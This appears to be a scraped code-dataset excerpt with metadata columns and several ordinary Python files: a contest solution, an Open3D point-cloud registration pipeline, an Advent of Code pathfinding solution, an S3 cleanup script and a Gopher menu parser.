| 49.25 | 104 | 0.72758 | 128 | 1,182 | 6.414063 | 0.367188 | 0.087698 | 0.146163 | 0.051157 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.107445 | 1,182 | 23 | 105 | 51.391304 | 0.778199 | 0 | 0 | 0 | 0 | 0 | 0.331922 | 0.03641 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.105263 | 0 | 0.105263 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df7ebc0c91b4ff97fcdcda3f164a6e33050dcd41 | 656 | py | Python | python/hps.py | TenType/competition | 1715c79c88992e4603b327f962f44eb5bffcb801 | [
"MIT"
] | 1 | 2022-02-05T02:11:37.000Z | 2022-02-05T02:11:37.000Z | python/hps.py | TenType/competition | 1715c79c88992e4603b327f962f44eb5bffcb801 | [
"MIT"
] | null | null | null | python/hps.py | TenType/competition | 1715c79c88992e4603b327f962f44eb5bffcb801 | [
"MIT"
] | null | null | null | n = int(input())
cow1 = []
cow2 = []
combinations = [[1, 2, 3], [1, 3, 2], [2, 1, 3], [2, 3, 1], [3, 1, 2], [3, 2, 1]]
results = []
for i in range(0, n):
temp1, temp2 = map(int, input().split())
cow1.append(temp1)
cow2.append(temp2)
# print(cow1)
# print(cow2)
for j in range(0, 6):
result = 0
for k in range(0, n):
index1 = combinations[j].index(cow1[k])
index2 = combinations[j].index(cow2[k])
# print(j, index1, index2)
if (index1 == 0 and index2 == 1) or (index1 == 1 and index2 == 2) or (index1 == 2 and index2 == 0):
result += 1
# print(j, index1, index2, " Winner")
results.append(result)
# print(results)
print(max(results))
| 24.296296 | 101 | 0.585366 | 110 | 656 | 3.490909 | 0.3 | 0.015625 | 0.0625 | 0.020833 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.102857 | 0.199695 | 656 | 26 | 102 | 25.230769 | 0.628571 | 0.150915 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.055556 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df7f6e381001b44fc6f3924b2ba0c8c7b78631c0 | 22,348 | py | Python | registerwithkeyframes.py | susu1210/3d_object_reconstruction | e8e9674f728a21c66b9766f5367850d1a65c84c2 | [
"MIT"
] | 2 | 2021-07-17T02:52:09.000Z | 2021-08-31T06:39:29.000Z | registerwithkeyframes.py | susu1210/3d_object_reconstruction | e8e9674f728a21c66b9766f5367850d1a65c84c2 | [
"MIT"
] | null | null | null | registerwithkeyframes.py | susu1210/3d_object_reconstruction | e8e9674f728a21c66b9766f5367850d1a65c84c2 | [
"MIT"
] | null | null | null | """
registerSegments.py
---------------
Main Function for registering (aligning) colored point clouds with ICP/feature
matching as well as pose graph optimizating
"""
# import png
from PIL import Image
import csv
import open3d as o3d
import pymeshlab
import numpy as np
import cv2
import os
import glob
from utils.ply import Ply
from utils.camera import *
from registration import icp, feature_registration, match_ransac, rigid_transform_3D
from tqdm import trange
from pykdtree.kdtree import KDTree
import time
import sys
from config.registrationParameters import *
from config.segmentationParameters import SEG_INTERVAL, STARTFRAME, SEG_METHOD,ANNOTATION_INTERVAL
from config.DataAcquisitionParameters import SERIAL,camera_intrinsics
import pandas as pd
# Set up parameters for registration
# voxel sizes use to down sample raw pointcloud for fast ICP
voxel_size = VOXEL_SIZE
max_correspondence_distance_coarse = voxel_size * 15
max_correspondence_distance_fine = voxel_size * 1.5
# Set up parameters for post-processing
# Voxel size for the complete mesh
voxel_Radius = VOXEL_R
# Point considered an outlier if more than inlier_Radius away from other points
inlier_Radius = voxel_Radius * 2.5
# search for up to N frames for registration, odometry only N=1, all frames N = np.inf
N_Neighbours = K_NEIGHBORS
def post_process(originals, voxel_Radius, inlier_Radius):
"""
Merge segments so that new points will not be add to the merged
model if within voxel_Radius to the existing points, and keep a vote
for if the point is issolated outside the radius of inlier_Radius at
the timeof the merge
Parameters
----------
originals : List of open3d.Pointcloud classe
6D pontcloud of the segments transformed into the world frame
voxel_Radius : float
Reject duplicate point if the new point lies within the voxel radius
of the existing point
inlier_Radius : float
Point considered an outlier if more than inlier_Radius away from any
other points
Returns
----------
points : (n,3) float
The (x,y,z) of the processed and filtered pointcloud
colors : (n,3) float
The (r,g,b) color information corresponding to the points
vote : (n, ) int
The number of vote (seen duplicate points within the voxel_radius) each
processed point has reveived
"""
for point_id in trange(len(originals)):
if point_id == 0:
vote = np.zeros(len(originals[point_id].points))
points = np.array(originals[point_id].points,dtype = np.float64)
colors = np.array(originals[point_id].colors,dtype = np.float64)
else:
points_temp = np.array(originals[point_id].points,dtype = np.float64)
colors_temp = np.array(originals[point_id].colors,dtype = np.float64)
dist , index = nearest_neighbour(points_temp, points)
new_points = np.where(dist > voxel_Radius)
points_temp = points_temp[new_points]
colors_temp = colors_temp[new_points]
inliers = np.where(dist < inlier_Radius)
vote[(index[inliers],)] += 1
vote = np.concatenate([vote, np.zeros(len(points_temp))])
points = np.concatenate([points, points_temp])
colors = np.concatenate([colors, colors_temp])
return (points,colors,vote)
def surface_reconstruction_screened_poisson(path):
ms = pymeshlab.MeshSet()
ms.load_new_mesh(path)
ms.compute_normals_for_point_sets()
ms.surface_reconstruction_screened_poisson()
ms.save_current_mesh(path)
filtered_mesh = o3d.io.read_point_cloud(path)
return filtered_mesh
def full_registration(pcds_down,cads,depths, max_correspondence_distance_coarse,max_correspondence_distance_fine):
"""
perform pairwise registration and build pose graph for up to N_Neighbours
Parameters
----------
pcds_down : List of open3d.Pointcloud instances
Downampled 6D pontcloud of the unalligned segments
max_correspondence_distance_coarse : float
The max correspondence distance used for the course ICP during the process
of coarse to fine registration
max_correspondence_distance_fine : float
The max correspondence distance used for the fine ICP during the process
of coarse to fine registration
Returns
----------
pose_graph: an open3d.PoseGraph instance
Stores poses of each segment in the node and pairwise correlation in vertice
"""
global N_Neighbours
pose_graph = o3d.pipelines.registration.PoseGraph()
odometry = np.identity(4)
pose_graph.nodes.append(o3d.pipelines.registration.PoseGraphNode(odometry))
n_pcds = len(pcds_down)
for source_id in trange(n_pcds):
for target_id in range(source_id + 1, min(source_id + N_Neighbours,n_pcds)):
# derive pairwise registration through feature matching
color_src = cads[source_id]
depth_src = depths[source_id]
color_dst = cads[target_id]
depth_dst = depths[target_id]
res = feature_registration((color_src, depth_src),
(color_dst, depth_dst))
if res is None:
# if feature matching fails, perform pointcloud matching
transformation_icp, information_icp = icp(
pcds_down[source_id], pcds_down[target_id],max_correspondence_distance_coarse,
max_correspondence_distance_fine, method = RECON_METHOD)
else:
transformation_icp = res
information_icp = o3d.pipelines.registration.get_information_matrix_from_point_clouds(
pcds_down[source_id], pcds_down[target_id], max_correspondence_distance_fine,
transformation_icp)
information_icp *= 1.2 ** (target_id - source_id - 1)
if target_id == source_id + 1:
# odometry
odometry = np.dot(transformation_icp, odometry)
pose_graph.nodes.append(o3d.pipelines.registration.PoseGraphNode(np.linalg.inv(odometry)))
pose_graph.edges.append(o3d.pipelines.registration.PoseGraphEdge(source_id, target_id,
transformation_icp, information_icp, uncertain=False))
else:
# loop closure
pose_graph.edges.append(o3d.pipelines.registration.PoseGraphEdge(source_id, target_id,
transformation_icp, information_icp, uncertain=True))
return pose_graph
def joints_full_registration(pcds_down, LinkOrientations, LinkPositions):
"""
perform pairwise registration using robot end-effector poses and build pose graph
Parameters
----------
pcds_down : List of open3d.Pointcloud instances
Downampled 6D pontcloud of the unalligned segments
LinkOrientations : List of end-effector Orientations
LinkPositions : List of end-effector positions
Returns
----------
pose_graph: an open3d.PoseGraph instance
Stores poses of each segment in the node and pairwise correlation in vertice
"""
global N_Neighbours
pose_graph = o3d.pipelines.registration.PoseGraph()
odometry = np.identity(4)
pose_graph.nodes.append(o3d.pipelines.registration.PoseGraphNode(odometry))
n_pcds = len(pcds_down)
for source_id in trange(n_pcds):
for target_id in range(source_id + 1, min(source_id + N_Neighbours, n_pcds)):
R1 , R2 = LinkOrientations[source_id] , LinkOrientations[target_id]
T1 , T2 = LinkPositions[source_id] , LinkPositions[target_id]
transformation_icp = calculate_transformation(R1 , R2, T1, T2)
information_icp = o3d.pipelines.registration.get_information_matrix_from_point_clouds(
pcds_down[source_id], pcds_down[target_id], max_correspondence_distance_fine,
transformation_icp)
if target_id == source_id + 1:
# odometry
odometry = np.dot(transformation_icp, odometry)
pose_graph.nodes.append(o3d.pipelines.registration.PoseGraphNode(np.linalg.inv(odometry)))
pose_graph.edges.append(o3d.pipelines.registration.PoseGraphEdge(source_id, target_id,
transformation_icp, information_icp, uncertain=False))
else:
# loop closure
pose_graph.edges.append(o3d.pipelines.registration.PoseGraphEdge(source_id, target_id,
transformation_icp, information_icp, uncertain=True))
return pose_graph
def calculate_transformation(R1, R2, T1, T2):
R = np.dot(R2, np.linalg.inv(R1))
T = T2 - np.dot(T1, np.dot(np.linalg.inv(R1).T, R2.T))
transformation_icp = [[R[0][0],R[0][1],R[0][2],T[0]],
[R[1][0],R[1][1],R[1][2],T[1]],
[R[2][0],R[2][1],R[2][2],T[2]],
[0,0,0,1]]
return transformation_icp
def load_robot_joints(path, keyframe_ids):
robot_joints = pd.read_csv(path+"/robot_joints.csv", index_col='filenames')
LinkR = robot_joints['LinkRotationMatrices']
LinkPositions = robot_joints['LinkPositions']
Rs=[]
Ts=[]
for filename in keyframe_ids:
R = list(map(float, LinkR[filename][1:len(LinkR[filename]) - 1].split(',')))
R = np.reshape(np.array(R), [3, 3])
T = np.array(list(map(float, LinkPositions[filename][1:len(LinkPositions[filename]) - 1].split(','))))
Rs.append(R)
Ts.append(T)
return Rs, Ts
def load_object_states(path, keyframe_ids):
robot_joints = pd.read_csv(path+"/robot_joints.csv", index_col='filenames')
ObjectR = robot_joints['ObjectRotationMatrices']
ObjectPositions = robot_joints['ObjectPositions']
Rs=[]
Ts=[]
for filename in keyframe_ids:
R = list(map(float, ObjectR[filename][1:len(ObjectR[filename]) - 1].split(',')))
R= np.reshape(np.array(R), [3, 3])
T = np.array(list(map(float, ObjectPositions[filename][1:len(ObjectPositions[filename]) - 1].split(','))))
Rs.append(R)
Ts.append(T)
return Rs, Ts
def load_colordepth(path,Filename):
mask_path = path + SEG_METHOD+'_results/%s.png' % (Filename)
# ignoring loss of segmented masks and ground-truth
# mask_path = path + 'annotations/%s.png' % (Filename)
exist = os.path.isfile(mask_path)
if exist:
mask = cv2.imread(mask_path, 0)
else:
mask_path = path + 'annotations/%s.png' % (Filename)
mask = cv2.imread(mask_path, 0)
img_file = path + 'cad/%s.jpg' % (Filename)
cad = cv2.imread(img_file)
cad = cv2.cvtColor(cad, cv2.COLOR_BGR2RGB)
# cv2.imshow("cad", cad)
# cv2.imshow("mask", mask)
# cv2.waitKey(0)
# cv2.destroyAllWindows()
segmented = cv2.bitwise_and(cad,cad,mask = mask)
# if Filename<=1000:
# bbx = np.zeros_like(mask,dtype='uint8')
# bbx[180:300,235:400] = 1
# segmented = cv2.bitwise_and(segmented, segmented, mask=bbx)
# cv2.imshow("segmented", segmented)
# cv2.waitKey(0)
# cv2.destroyAllWindows()
# color_thr = 125
# color_mask = np.asarray(np.logical_and((segmented[:,:,0]>=color_thr),
# np.logical_and( (segmented[:,:,1]>=color_thr),(segmented[:,:,2]>=color_thr))),dtype=np.uint8)*255
# color_mask = np.asarray(np.logical_xor(mask, color_mask), dtype=np.uint8)*255
# segmented = cv2.bitwise_and(segmented, segmented, mask=color_mask)
# cv2.imshow("segmented", segmented)
# cv2.waitKey(0)
# cv2.destroyAllWindows()
depth_file = path + 'depth/%s.png' % (Filename)
depth = Image.open(depth_file)
depth = np.array(depth, dtype=np.uint16)
if SEG_METHOD == "MaskRCNN":
depth_thr = 0.9 * 65535
depth_mask = np.asarray(depth>= depth_thr, dtype=np.uint8) * 255
depth_mask = np.asarray(np.logical_xor(mask, depth_mask), dtype=np.uint8) * 255
segmented = cv2.bitwise_and(segmented, segmented, mask=depth_mask)
# cv2.imshow("segmented", segmented)
# cv2.waitKey(0)
# cv2.destroyAllWindows()
pointcloud = convert_depth_frame_to_pointcloud(depth, SERIAL, camera_intrinsics)
return (segmented, depth, pointcloud)
def select_keyframes(path):
keyframe_ids = []
Filename = SEG_INTERVAL + STARTFRAME
Matched = True
try:
while True:
if Matched:
interval = int(KEYFRAME_INTERVAL/SEG_INTERVAL)*SEG_INTERVAL
else:
interval -= SEG_INTERVAL
color_src, mask_src, pointcloud_src = load_colordepth(path,Filename)
color_dst, mask_dst, pointcloud_dst = load_colordepth(path,Filename + interval)
res = feature_registration((color_src, pointcloud_src),
(color_dst, pointcloud_dst))
if res is not None:
if Filename not in keyframe_ids:
keyframe_ids.append(Filename)
keyframe_ids.append(Filename+interval)
Filename += interval
Matched = True
continue
else:
segmented_mask_src = cv2.cvtColor(color_src, cv2.COLOR_BGR2GRAY)
segmented_mask_dst = cv2.cvtColor(color_dst, cv2.COLOR_BGR2GRAY)
segmented_mask_src[mask_src==0] = 0
segmented_mask_dst[mask_dst==0] = 0
src_show = pointcloud_src[segmented_mask_src>0]
dst_show = pointcloud_dst[segmented_mask_dst>0]
source = o3d.geometry.PointCloud()
source.points = o3d.utility.Vector3dVector(src_show)
source.colors = o3d.utility.Vector3dVector(color_src[segmented_mask_src>0])
target = o3d.geometry.PointCloud()
target.points = o3d.utility.Vector3dVector(dst_show)
target.colors = o3d.utility.Vector3dVector(color_dst[segmented_mask_dst>0])
voxel_radius = [ 0.001, 0.001, 0.001 ]
max_iter = [ 80, 80, 80 ]
current_transformation = np.identity(4)
for scale in range(3):
iter = max_iter[scale]
r = voxel_radius[scale]
source_down = source.voxel_down_sample(voxel_size = r)
target_down = target.voxel_down_sample(voxel_size = r)
source_down.estimate_normals( search_param=o3d.geometry.KDTreeSearchParamHybrid(radius = r * 2, max_nn = 30))
target_down.estimate_normals( search_param=o3d.geometry.KDTreeSearchParamHybrid(radius = r * 2, max_nn = 30))
result_icp = o3d.pipelines.registration.registration_colored_icp(target_down, source_down,
r, current_transformation,
o3d.pipelines.registration.TransformationEstimationForColoredICP(),
o3d.pipelines.registration.ICPConvergenceCriteria(
relative_fitness=1e-8, relative_rmse=1e-8, max_iteration=iter))
current_transformation = result_icp.transformation
if len(np.asarray(result_icp.correspondence_set))> 1000:
Matched = True
if Filename not in keyframe_ids:
keyframe_ids.append(Filename)
keyframe_ids.append(Filename+interval)
Filename += interval
continue
elif interval - SEG_INTERVAL < SEG_INTERVAL:
Matched = True
if Filename not in keyframe_ids:
keyframe_ids.append(Filename)
keyframe_ids.append(Filename+interval)
Filename += interval
continue
else:
Matched = False
except:
return keyframe_ids
def load_sources(path, keyframe_ids):
"""
load segmented color images, depth readings, pointcloud(unsampled) and
pointcloud(downsampled) for at the specified keyframe intervals
"""
global voxel_size
cads = []
depths = []
pcds= []
pcds_down = []
num_frames = len(glob.glob1(path + "cad","*.jpg"))
for Filename in keyframe_ids:
segmented, mask, depth = load_colordepth(path,Filename)
cads.append(segmented)
depths.append(depth)
color_gray = cv2.cvtColor(segmented, cv2.COLOR_BGR2GRAY)
color_gray[mask == 0] = 0
mask = color_gray
source = o3d.geometry.PointCloud()
source.points = o3d.utility.Vector3dVector(depth[mask>0])
source.colors = o3d.utility.Vector3dVector(segmented[mask>0])
# o3d.visualization.draw_geometries([source])
pcds.append(source)
pcd_down = source.voxel_down_sample(voxel_size = voxel_size)
pcd_down.estimate_normals(o3d.geometry.KDTreeSearchParamHybrid(radius = 0.002 * 2, max_nn = 30))
pcds_down.append(pcd_down)
return (cads,depths,pcds,pcds_down)
def nearest_neighbour(a, b):
"""
find the nearest neighbours of a in b using KDTree
Parameters
----------
a : (n, ) numpy.ndarray
b : (n, ) numpy.ndarray
Returns
----------
dist : n float
Euclidian distance of the closest neighbour in b to a
index : n float
The index of the closest neighbour in b to a in terms of Euclidian distance
"""
tree = KDTree(b)
dist, index = tree.query(a)
return (dist, index)
def print_usage():
print( "Usage: registerwithkeyframes.py <path>")
print( "path: [data_path]/all or name of the folder")
print( "e.g., registerwithkeyframes.py Data/all, registerwithkeyframes.py Data_new/all, "
"registerwithkeyframes.py Data/Cheezit")
if __name__ == "__main__":
try:
if sys.argv[1][-3:] == "all":
folders = glob.glob(sys.argv[1][:-3]+"*/")
elif sys.argv[1]+"/" in glob.glob("Data_new/*/") \
or sys.argv[1]+"/" in glob.glob("Data/*/")\
or sys.argv[1]+"/" in glob.glob("Data_stuck/*/"):
folders = [sys.argv[1]+"/"]
else:
print_usage()
exit()
except:
print_usage()
exit()
print("SEG_METHOD ", SEG_METHOD)
print("RECON_METHOD ",RECON_METHOD)
for path in folders:
print(path)
print("select key frames ...")
exist = os.path.isfile(path + "keyframe_ids.csv")
if exist:
with open(path + "keyframe_ids.csv", 'r') as f:
reader = csv.reader(f)
keyframe_ids = [row[0] for row in reader]
keyframe_ids = list(map(int, keyframe_ids[1:]))
else:
keyframe_ids = select_keyframes(path)
key = pd.DataFrame({'keyframe_ids': np.array(keyframe_ids, dtype=int)})
key.to_csv(path + 'keyframe_ids.csv', index=False)
# keyframe_ids = list(range(1,1205,5))
print("Load pointclouds ...")
cads,depths,originals,pcds_down = load_sources(path, keyframe_ids)
print("Full registration ...")
if RECON_METHOD == "robot-joints":
LinkOrientations, LinkPositions = load_robot_joints(path, keyframe_ids)
ObjectOrientations, ObjectPositions = load_object_states(path, keyframe_ids)
pose_graph = joints_full_registration(pcds_down, LinkOrientations, LinkPositions)
# pose_graph = joints_full_registration(pcds_down, ObjectOrientations, ObjectPositions)
else:
pose_graph = full_registration(pcds_down, cads, depths,
max_correspondence_distance_coarse,
max_correspondence_distance_fine)
print("Optimizing PoseGraph ...")
option = o3d.pipelines.registration.GlobalOptimizationOption(
max_correspondence_distance = max_correspondence_distance_fine,
edge_prune_threshold = 0.25,
reference_node = 0)
o3d.pipelines.registration.global_optimization(pose_graph,
o3d.pipelines.registration.GlobalOptimizationLevenbergMarquardt(),
o3d.pipelines.registration.GlobalOptimizationConvergenceCriteria(), option)
print( "Merge segments")
for point_id in trange(len(originals)):
originals[point_id].transform(pose_graph.nodes[point_id].pose)
print("Apply post processing")
points, colors, vote = post_process(originals, voxel_Radius, inlier_Radius)
ply = Ply(points[vote>1], colors[vote>1])
pg = pd.DataFrame({'PoseGraph': pose_graph}, index=[0])
pg.to_csv(os.path.join(path, "pose_graph.csv"))
meshfile = '%s.ply' % (path[:-1]+'_'+SEG_METHOD+'_'+RECON_METHOD)
ply.write(meshfile)
print("Mesh saved")
# Surface_reconstruction_screened_poisson & remove_statistical_outlier
# Surface_reconstruction_screened_poisson & remove_statistical_outlier
if WATERTIGHT_POLYGON_MESH:
pcd = o3d.io.read_point_cloud(meshfile)
cl, ind = pcd.remove_statistical_outlier(nb_neighbors=30,
std_ratio=2.0)
output_path = os.path.join(os.getcwd(),meshfile.split('.')[0] + "_filtered.ply")
o3d.io.write_point_cloud(output_path, cl)
pcd = surface_reconstruction_screened_poisson(output_path)
coordinate = o3d.geometry.TriangleMesh.create_coordinate_frame(size=0.5, origin=[0, 0, 0])
o3d.visualization.draw_geometries([pcd, coordinate])
else:
coordinate = o3d.geometry.TriangleMesh.create_coordinate_frame(size=0.5, origin=[0, 0, 0])
o3d.visualization.draw_geometries([o3d.io.read_point_cloud(meshfile),coordinate])
pass
| 39.553982 | 143 | 0.629363 | 2,618 | 22,348 | 5.174561 | 0.167685 | 0.02436 | 0.033661 | 0.017126 | 0.449472 | 0.398908 | 0.375729 | 0.3245 | 0.308039 | 0.281465 | 0 | 0.019779 | 0.273805 | 22,348 | 564 | 144 | 39.624113 | 0.814961 | 0.192724 | 0 | 0.301493 | 0 | 0 | 0.040479 | 0.006671 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035821 | false | 0.002985 | 0.056716 | 0 | 0.125373 | 0.047761 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df820b00fafa8e7fb9f86f007a0a19a6003fd3fb | 803 | py | Python | advent-of-code/2021/day-15-part-1.py | scorphus/sparring | 6e53d81f2db39df58561a7fd941d73090712ba52 | [
"MIT"
] | 2 | 2017-01-06T15:32:50.000Z | 2020-04-16T20:56:02.000Z | advent-of-code/2021/day-15-part-1.py | scorphus/sparring | 6e53d81f2db39df58561a7fd941d73090712ba52 | [
"MIT"
] | null | null | null | advent-of-code/2021/day-15-part-1.py | scorphus/sparring | 6e53d81f2db39df58561a7fd941d73090712ba52 | [
"MIT"
] | null | null | null | import heapq
with open("day-15.txt") as f:
lines = [line for line in f.read().rstrip().splitlines()]
graph = {}
for i, row in enumerate(lines):
for j, n in enumerate(row):
graph[i, j] = int(n)
DELTAS = (
(0, 1),
(1, 0),
(-1, 0),
(0, -1),
)
def find_lowest_risk(graph, start, end):
queue = [(0, *start)]
seen = {start}
while queue:
risk, i, j = heapq.heappop(queue)
if (i, j) == end:
return risk
for di, dj in DELTAS:
ni, nj = i + di, j + dj
if (ni, nj) in graph and (ni, nj) not in seen:
seen.add((ni, nj))
heapq.heappush(queue, (risk + graph[ni, nj], ni, nj))
size = len(lines)
end = size - 1, size - 1
risk = find_lowest_risk(graph, (0, 0), end)
print(risk)
| 21.702703 | 69 | 0.506849 | 124 | 803 | 3.25 | 0.395161 | 0.059553 | 0.069479 | 0.094293 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.027726 | 0.326276 | 803 | 36 | 70 | 22.305556 | 0.71719 | 0 | 0 | 0 | 0 | 0 | 0.012453 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.034483 | false | 0 | 0.034483 | 0 | 0.103448 | 0.034483 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df85135a7ca551c37959030d0ede868200ce2534 | 1,621 | py | Python | mycleanup.py | azam-a/newdeployments | eb23fa35f2c200b9726760e70a36e95ba277478f | [
"MIT"
] | null | null | null | mycleanup.py | azam-a/newdeployments | eb23fa35f2c200b9726760e70a36e95ba277478f | [
"MIT"
] | null | null | null | mycleanup.py | azam-a/newdeployments | eb23fa35f2c200b9726760e70a36e95ba277478f | [
"MIT"
] | null | null | null |
import re
from mydeploy import (
get_file_objects,
S3Util,
)
from environment_config import (
AWS_CONFIG_PATH,
AWS_PROFILE,
CSS_BUCKET,
IMAGE_BUCKET,
JS_BUCKET,
CSS_PREFIX,
IMAGE_PREFIX,
JS_PREFIX,
XML_PATH
)
def cleanup_main():
c = S3Util.create_connection_pools(AWS_CONFIG_PATH, AWS_PROFILE,
CSS_BUCKET, JS_BUCKET, IMAGE_BUCKET)
existing_versioned_files_in_xml = get_file_objects(c, XML_PATH)
keys_in_xml = [item.versioned_path_in_bucket for item
in existing_versioned_files_in_xml]
for bucket in [
(c['css_bucket'], CSS_PREFIX),
(c['js_bucket'], JS_PREFIX),
(c['image_bucket'], IMAGE_PREFIX)]:
keys_matching_pattern = get_all_matching_keys(bucket[0], bucket[1])
for key_ in keys_matching_pattern:
if (key_.key in keys_in_xml):
print('Skipping deletion of http://' + bucket[0].name +
'.s3.amazonaws.com/' + key_.key +
', currently indexed in XML file \n')
else:
key_.delete()
print('Deleted http://' + bucket[0].name +
'.s3.amazonaws.com/' + key_.key + '\n')
def get_all_matching_keys(bucket, prefix_=None):
return [item for item in bucket.list(prefix=prefix_)
if is_matching_versioned_pattern(item.key)]
def is_matching_versioned_pattern(path):
return bool(re.search('\/(.*-\d{12}\..*$)', path))
if __name__ == '__main__':
cleanup_main()
| 25.730159 | 75 | 0.587909 | 196 | 1,621 | 4.464286 | 0.321429 | 0.028571 | 0.032 | 0.036571 | 0.269714 | 0.153143 | 0.153143 | 0.08 | 0.08 | 0 | 0 | 0.008889 | 0.305984 | 1,621 | 62 | 76 | 26.145161 | 0.768889 | 0 | 0 | 0 | 0 | 0 | 0.106173 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.069767 | false | 0 | 0.069767 | 0.046512 | 0.186047 | 0.046512 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df867ad23e683b9a9e6885db5e7d9658c76ccb74 | 4,276 | py | Python | menu.py | ateesdalejr/gseepy | 696b415b1eba9cf1e44ec3b84aff5fcabd12e26e | [
"MIT"
] | null | null | null | menu.py | ateesdalejr/gseepy | 696b415b1eba9cf1e44ec3b84aff5fcabd12e26e | [
"MIT"
] | null | null | null | menu.py | ateesdalejr/gseepy | 696b415b1eba9cf1e44ec3b84aff5fcabd12e26e | [
"MIT"
] | null | null | null | import sys
class DirEntity:
def __init__(self, type_char, user_name, selector, host, port):
self.type = type_char
self.user_name = user_name
self.selector = selector
self.host = host
self.port = port
def __eq__(self, other):
if type(other) != type(self): return False
if self.type != other.type: return False
if self.user_name != other.user_name: return False
if self.selector != other.selector: return False
if self.host != other.host: return False
if self.port != other.port: return False
return True
def __str__(self):
return str((self.type, self.user_name, self.selector, self.host, self.port))
def __repr__(self):
return self.__str__()
class Parser:
"""
Parses Gopher menus into DirEntity objects.
"""
def __init__(self, text):
self._text = text
self._i, self._char = -1, None
self._get_char()
def _get_char(self):
"""
Get a character and store it in self._char if it tries to read over the text.
"""
self._i += 1
if self._i < len(self._text):
self._char = self._text[self._i]
else:
self._char = -1
def _error(self, msg):
print(f"error: {msg}", file = sys.stderr) # put error here for match failure
sys.exit(-1)
def _match(self, c):
buf = ""
while self._char != -1 and len(c) > len(buf):
buf += self._char
self._get_char()
if c != buf:
c, buf = repr(c), repr(buf)
self._error(f"expected {c} not {buf}")
def _grab_type(self):
"""
Grabs a single type character and returns it.
"""
c = self._char
if not c in "0123456789+TgI" + "ih":
c = repr(c)
self._error(f"unknown type {c}")
self._get_char()
return c
def _grab_unascii(self):
"""
Grabs an ascii string that doesn't include NUL, Tab or CR-LF.
"""
unascii = ""
while self._char != -1 and not self._char in "\x00\t\r\n":
unascii += self._char
self._get_char()
return unascii
def _grab_host(self):
"""
Parses a host and returns it.
"""
host = ""
while True:
while self._char != -1 and not self._char in ".\x00\t\r\n":
host += self._char
self._get_char()
if self._char == ".":
host += "."
self._get_char()
else:
break
return host
def _grab_port(self):
"""
Parses a port and returns an integer. If, there is no port it raises an error.
"""
port = ""
while self._char != -1 and self._char in "0123456789":
port += self._char
self._get_char()
if len(port) == 0:
self._error("port empty")
return int(port)
def _parse_dir(self):
"""
Parses a single directory entity and returns a new DirEntity object.
"""
type_char = self._grab_type()
user_name = self._grab_unascii() #This gets the user_name field for the DirEntity
self._match("\t")
selector = self._grab_unascii() #This gets the selector.
self._match("\t")
host = self._grab_host()
self._match("\t")
port = self._grab_port()
self._match("\r\n")
return DirEntity(type_char, user_name, selector, host, port)
def parse(self):
"""
Returns a list of DirEntity objects.
"""
dirs = []
# TODO implement correct handling of periods and lastline pattern
while self._char != -1 and self._char != ".":
dirs.append(self._parse_dir())
return dirs
def run_tests():
"""
Runs tests on the MenuParser class.
"""
p = Parser(b"0About prices\tPrices/aboutus\tserver.example.com\t70\r\n".decode("ascii"))
print(p._parse_dir())
if __name__ == "__main__":
run_tests()
| 30.326241 | 93 | 0.520814 | 527 | 4,276 | 3.994307 | 0.252372 | 0.072209 | 0.029929 | 0.04038 | 0.160095 | 0.142993 | 0.088361 | 0.034204 | 0.034204 | 0.034204 | 0 | 0.013658 | 0.366464 | 4,276 | 140 | 94 | 30.542857 | 0.763381 | 0.151544 | 0 | 0.125 | 0 | 0 | 0.057698 | 0.015184 | 0 | 0 | 0 | 0.007143 | 0 | 1 | 0.15625 | false | 0 | 0.010417 | 0.020833 | 0.28125 | 0.020833 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df89b374617f742546d6eb7e0fd0ae663bedfddc | 5,265 | py | Python | 06-learning-to-classify-text/util/data_util.py | SolangeUG/nltk-book | 05051325a64836ae5c89d18f3c2145e9a6c4f0ae | [
"Apache-2.0"
] | 2 | 2018-08-05T15:50:12.000Z | 2019-01-24T05:52:02.000Z | 06-learning-to-classify-text/util/data_util.py | SolangeUG/nltk-book | 05051325a64836ae5c89d18f3c2145e9a6c4f0ae | [
"Apache-2.0"
